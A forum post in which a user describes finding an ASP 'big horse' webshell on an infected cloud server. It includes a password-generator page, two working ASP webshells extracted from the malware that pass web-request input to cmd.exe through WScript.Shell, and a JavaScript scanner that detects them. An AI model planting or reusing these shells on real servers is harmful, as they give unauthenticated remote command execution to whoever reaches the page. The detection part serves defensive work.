djwdj
Posted on 2022-8-10 22:56
This primary-schooler's cloud machine got infected with a trojan again. I used the password 123456 for three years with no problems; now it's a mess and the machine got infected within a week. I added letters and then symbols to the password and still got infected, so I have already switched to random passwords. In a moment I'll share a simple password generator.
The last time it got infected I also noticed a garbled file; I didn't think much of it, just deleted it, changed the password and kept using the machine.
This time it got infected again, so I decided to take a look. Opening the file directly showed nothing readable, so I ran it, pulled a few keywords from the page source and searched Bing for them, and learned that this thing is called a "big horse" (大马). I thought it was a virus made by someone called Dama. Only after reading many articles did I learn that the large full-featured ones are called "big horses" and the one-liner ones are called "small horses" (小马).
I also saw many labelled "no backdoor", downloaded a few and ran them locally. It turned out they all had backdoors; two trojans were fighting each other and the machine simply hung. In the end I found that the administrator account on my machine was no longer an administrator and had no permissions at all. Better not to run big horses any more. I disabled IIS outright and used Huorong Sword to shut down the leftovers.
I tried net user to add the account back to the administrators group and found that cmd had no permission. I wanted to write a .bat, but had no permission on the C: drive, nor on the D: drive. Luckily the user directory was still usable. After writing it, I right-clicked Run as administrator, and after a reboot the D: drive was usable again. In short, never trust any trojan that claims to have no backdoor.
The big horse's features are actually not bad and could be put to use, but with F12 you can see it constantly connecting to other compromised machines. Huorong also caught the big horse sending things via XMLHTTP. But I still wanted to use those features, so I decided to extract the ones I needed. Once extracted they didn't run;
luckily I had read some ASP before and found that the big horse had modified the functions. It took a long time to locate them. Even the shell was stored in an array; it took a long time to piece together enough source for a single page.
The Primary-Schooler's Password Generator
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="MobileOptimized" content="320">
<title> 随机密码基</title>
<style>
@font-face {
font-family: "iconfont"; /* Project id */
src: url('data:application/octet-stream;base64,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') format('truetype');
}
.iconfont {
font-family: "iconfont" !important;
font-size: 16px;
font-style: normal;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-copy:before {
content: "\e67f";
}
.form-row {
display: -ms-flexbox;
display: flex;
-ms-flex-wrap: wrap;
flex-wrap: wrap;
margin-right: -5px;
margin-left: -5px;
}
.shadow {
box-shadow: 0 .5rem 1rem rgba(0,0,0,.15)!important;
}
.col-md-6 {
position: relative;
width: 100%;
padding-right: 15px;
padding-left: 15px;
}
@media(min-width: 1200px){
html {
font-size: 138% !important;
}
.col-md-6 {
-ms-flex: 0 0 50%;
flex: 0 0 50%;
max-width: 50%;
}
}
*, ::after, ::before {
box-sizing: border-box;
}
.custom-select {
width:60%;
padding: 0.5rem 1rem;
background: #fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%233e3f3a' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px;
-moz-appearance: none;
appearance: none;
}
.ck{
margin-bottom: 32px;
}
#zd{
width:100%;
}
.card-header button{
padding: 6px 12px;
border-radius: 33px;
}
.card-header {
text-align: center;
background: #ccc;
padding: 5px;
}
.card-body {
text-align: center;
}
#output{
font-weight: 700;
font-size:300%;
background: #f55;
color: #fff;
padding: 11px 33px;
}
#copycode{
border: 2px solid #f55;
background: #fff;
color: #f55;
}
#pw:active {
opacity: 0;
transition: 0s
}
#pw{
transition: all 2s; /* press animation for :active */
animation-name: animatetop;
animation-duration: 2s
}
@keyframes animatetop {
from { opacity:0}
to { opacity:1}
}
</style>
</head>
<body>
<div class="form-row">
<div class="col-md-6 shadow ">
<div class="input-group">
密码长度:
<select id="pgLength" class="custom-select">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6" selected>6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
</select>
</div>
<div class="ck">
<input type="checkbox" checked id="chkl">
<label for="chkl">
小写字母(a..z)
</label>
<br>
<input type="checkbox" checked id="chku">
<label for="chku">
大写字母(A..Z)
</label>
<br>
<input type="checkbox" checked id="chkn">
<label for="chkn">
数字(0..9)
</label>
<br>
<input type="checkbox" id="chksc">
<label for="chksc">
特殊字符
</label>
<br>
<input type="checkbox" id="chkzd"><label for="chkzd">
自定义</label>
<div class=zd style="display:none">
<textarea id="zd" rows="6">字典</textarea>
<br>
<button id='zdl' onclick="generateZD();"> 生成字典1</button>
<button id='zd2' onclick="generateZD2();"> 生成字典2</button>
</div>
</div>
</div>
<div class="col-md-6">
<div class="card-header">
<button id='pw' onclick="generatePassword();"> 生成密码</button>
<button id="copycode"><span class="icon iconfont icon-copy"></span> 复制</button>
</div>
<div class="card-body">
<h5><span id="output">aC0*vN</span></h5>
</div>
</div>
</div>
<script>
function $(j8) {
return document.querySelector(j8);
}
function al(j,k) {
var b="";
for (var i=j;i<k;i++){
b+=String.fromCharCode(i);
}
return b;
}
$( "#pgLength" ).onchange=generatePassword;
$( "#chkl" ).onchange=generatePassword;
$( "#chku" ).onchange=generatePassword;
$( "#chkn" ).onchange=generatePassword;
$( "#chksc" ).onchange=generatePassword;
$( "#chkzd" ).onchange=function(){
v=$(".ck .zd").style;
console.log("%c"+v.display, "color:red");
if($("#chkzd").checked){
v.display='';
}else{
v.display='none';
}
}
function generateZD(){
$("#zd").value=al(33,127);
}
function generateZD2(){
$("#zd").value=al(161,256);
}
function generatePassword(){
$("#output").innerText='';
var length = $("#pgLength").value;
var zd = $("#zd").value;
var string = "abcdefghijklmnopqrstuvwxyz";
var strUpper="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var numeric = '0123456789';
var punctuation = '!@#$%^&*()_+~`|}{[]\:;?><,./-=';
var password = "";
while( password.length<length ) {
// Uniform random index in [0, n); multiplying two Math.random() values and
// using Math.ceil()-1 would skew picks toward the first characters and could yield -1.
var entity1 = Math.floor(string.length * Math.random());
var entity2 = Math.floor(numeric.length * Math.random());
var entity3 = Math.floor(punctuation.length * Math.random());
var entity4 = Math.floor(strUpper.length * Math.random());
var entity5 = Math.floor(zd.length * Math.random());
if($("#chkl").checked || $("#chku").checked || $("#chkn").checked || $("#chksc").checked || $("#chkzd").checked) {
if($("#chkl").checked && password.length<length){
password += string.charAt( entity1 );
}
if($("#chku").checked && password.length<length){
password += strUpper.charAt( entity4 );
}
if($("#chkn").checked && password.length<length ){
password += numeric.charAt( entity2 );
}
if($("#chksc").checked && password.length<length){
password += punctuation.charAt( entity3 );
}
if($("#chkzd").checked && password.length<length){
password += zd.charAt( entity5 );
}
} else {
$("#chkn").checked=true;
//break;
}
}
if(password.trim()) {
$("#output").innerText=password.trim();
} else {
$("#output").innerText="请勾选选项!";
}
}
$('#copycode').onclick=function() {
var o=document.getElementById("output");
//o.select(); // select the element
//document.execCommand("Copy"); // run the browser copy command
const input = document.createElement('input');
document.body.appendChild(input);
input.setAttribute('value', o.innerText);
input.select();
document.execCommand('copy');
document.body.removeChild(input);
v=$("#copycode");
cc=v.innerHTML;
v.innerHTML="已复制";
v.style.transition='2s';
v.style.opacity=0;
setTimeout(function(){ v.innerHTML=cc;v.style.opacity=1; }, 2000);
}
generatePassword();
</script>
</body>
</html>
Extracted from the first big horse. It has two methods: calling WScript.Shell (ws) directly, and having ws redirect output to a mapped text file and then reading that file back.
[screenshot could not be posted]
<head>
<title>WebCmd</title>
<style type="text/css">
body,textarea,input{background:#000;color:#fff;}
textarea,input{border-radius:13px;border:1px solid #fff;margin:1px;}
</style>
</head>
<%
'Server.ScriptTimeout=999999999:Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Dim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS建库组件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS压缩组件":ObT(4,0) = "Scripting.Dictionary" :ObT(4,2) = "数据流上传辅助组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP发信组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail发信组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件"
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
if ws="" Then Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
Cmd1Shell()
ShowErr()
%>
The second big horse obtains ws (WScript.Shell) through its CLSID.
<style>
body,tr,td {
margin-top: 5px;
background-color: #000000;
color: #006000;
font-size: 12px;
scrollbar-face-color: #232323;
scrollbar-arrow-color: #383839;
scrollbar-highlight-color: #383839;
scrollbar-3dlight-color: #dddddd;
scrollbar-shadow-color: #232323}
input,select,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 11px;
border-left-color: #dddddd;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #dddddd;
color: #dddddd;
border-top-color: #dddddd;
font-family: verdana;
border-right-width: 1px;
border-right-color: #dddddd;
}
</style>
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
Sub RRS(str)
response.write(str)
End Sub
Sub j(str)
response.write(str)
End Sub
function Cmdx()
j("<center><form method='post'> ")
j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> ")
j("<input type=text name='cmd' size=60><br> ")
j("<input type=submit value='Sumbit'></form> ")
j("<textarea readonly cols=150 rows=27> ")
On Error Resume Next
j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
j("</textarea></center>")
end function
cmdx()
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
%>
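Both shells above obtain WScript.Shell in a way that leaves recognisable traces in the page source: the first through the ProgID string stored in its ObT array and `Server.CreateObject`, the second through `<object runat=server classid="clsid:...">`, and both pipe `request()` input into `.exec()` and read `.stdout.readall`. This added example (not code from the post) turns those traits into a line-by-line indicator scan for ASP files; the indicator names, sample snippets and the two-indicator threshold are my own constructions.

```javascript
// Added example, not from the original post: a minimal indicator scan for ASP
// source, keyed to how the two shells above obtain WScript.Shell (ProgID string
// via CreateObject, or CLSID via <object runat=server>) and run commands.
// Node.js, no dependencies. Indicators are checked line by line.
const INDICATORS = [
  { id: 'wscript-progid', re: /["']wscript\.shell["']/i },
  // CLSIDs taken from the second shell's <object> tags shown above
  { id: 'wscript-clsid', re: /clsid:(?:72C24DD5-D70A-438B-8A42-98424B88AFB8|F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)/i },
  { id: 'runat-server-object', re: /<object[^>]*runat\s*=\s*["']?server/i },
  { id: 'shell-exec', re: /\.exec\s*\(/i },
  // request() flowing into exec on the same line; the first shell routes the
  // request through a variable first, so this rule alone would miss it.
  { id: 'request-to-exec', re: /\.exec\s*\([^\n]*request\s*\(/i },
  { id: 'stdout-readall', re: /\.stdout\.readall/i },
];

// Constructed samples modelled on the two shells above, plus one benign page.
const SAMPLE_SHELL_A = [
  'Dim ObT(13,2):ObT(1,0) = "wscript.shell"',
  'Set CM=CreateObject(ObT(1,0))',
  'Set DD=CM.exec(ShellPath&" /c "&DefCmd)',
  'aaa=DD.stdout.readall',
].join('\n');
const SAMPLE_SHELL_B = [
  '<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>',
  'j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall',
].join('\n');
const SAMPLE_BENIGN = [
  '<% Set rs = Server.CreateObject("ADODB.Recordset")',
  'rs.Open "SELECT name FROM products", conn %>',
].join('\n');

// Returns every indicator hit with its 1-based line number.
function scanAsp(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const ind of INDICATORS) if (ind.re.test(text)) findings.push({ id: ind.id, line: i + 1 });
  });
  return findings;
}

// A file is flagged when at least `minDistinct` different indicators fire,
// which keeps a lone stdout.readall or <object runat=server> from alerting.
function isSuspicious(source, minDistinct = 2) {
  return new Set(scanAsp(source).map((f) => f.id)).size >= minDistinct;
}

for (const [name, src] of [['shell A', SAMPLE_SHELL_A], ['shell B', SAMPLE_SHELL_B], ['benign', SAMPLE_BENIGN]]) {
  console.log(name, isSuspicious(src) ? 'SUSPICIOUS' : 'clean', scanAsp(src).map((f) => f.id).join(','));
}
```

Because the ProgID rule matches the string literal rather than the CreateObject call, it still fires when the shell stashes the ProgID in an array as the first sample does.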
This can be used to control your own machine, but be careful not to let a trojan exploit it. I originally wanted to write a long article analysing the code, but unfortunately my keyboard broke and this post sat in drafts for days. Now I no longer feel like writing that much; it has really worn this primary-schooler out.
I'm a true fan.
Almost posted without remembering to attach the big horse.
It's all encoded, and I don't know whether my password information is hidden somewhere in it. I found a decoding tool on Baidu, but it is 16-bit and needs MS-DOS, so I can't decode it for now. Parts of it can be decoded with Response.Write, but that is a bit of a hassle.
Attachments (archive password: 52pojie):
- 大马植入的东西.7z (37.75 KB, downloads: 7, cost: -1 CB)
- 大马.7z (73.52 KB, downloads: 9, cost: -1 CB)
- webcmd2.7z (890 Bytes, downloads: 7, cost: -1 CB)
- webcmd.7z (1.4 KB, downloads: 6, cost: -1 CB)